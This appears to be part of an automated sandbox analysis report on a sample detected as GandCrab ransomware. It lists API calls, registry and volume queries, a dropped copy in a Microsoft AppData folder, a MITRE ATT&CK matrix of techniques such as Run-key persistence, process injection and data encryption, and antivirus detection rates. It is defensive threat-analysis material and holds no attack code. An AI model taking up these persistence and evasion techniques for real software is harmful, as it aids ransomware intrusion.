Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_12-1765
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_12-1756
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_12-1893

Source: mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: wzltxa.exe, 0000000B.00000002.319600520.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000000D.00000002.356865636.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000000F.00000002.384044865.0000000000818000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000012.00000002.406611615.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000016.00000002.443986356.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000001C.00000002.510519508.0000000001098000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000001F.00000002.546253684.0000000001488000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000021.00000002.566670485.000000000077F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F698400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F698400

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F693200 lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpyA,

0_2_0F693200

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F695FF0 mov eax, dword ptr fs:[00000030h]	0_2_0F695FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB5FF0 mov eax, dword ptr fs:[00000030h]	11_2_0FBB5FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB5FF0 mov eax, dword ptr fs:[00000030h]	12_2_0FBB5FF0

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F693C70 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,

0_2_0F693C70

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F699200 cpuid

0_2_0F699200

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

0_2_0F697490

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	1 Native API	11 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	1 Input Capture	1 Query Registry	1 Replication Through Removable Media	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Proxy	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 File and Directory Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	44 System Information Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mPNVrHIpyt.exe	84%	Virustotal		Browse
mPNVrHIpyt.exe	78%	Metadefender		Browse
mPNVrHIpyt.exe	97%	ReversingLabs	Win32.Ransomware.GandCrab
mPNVrHIpyt.exe	100%	Avira	TR/Dropper.Gen
mPNVrHIpyt.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
27.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
27.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
20.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
11.3.wzltxa.exe.3940000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.mPNVrHIpyt.exe.f690000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.3.wzltxa.exe.2fa0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
13.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
20.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
31.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
40.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
13.3.wzltxa.exe.3270000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
39.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
34.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
11.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
30.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
33.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
11.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.2.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.wzltxa.exe.fbb0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
39.3.wzltxa.exe.4010000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
31.3.wzltxa.exe.3b90000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.3.wzltxa.exe.3b20000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
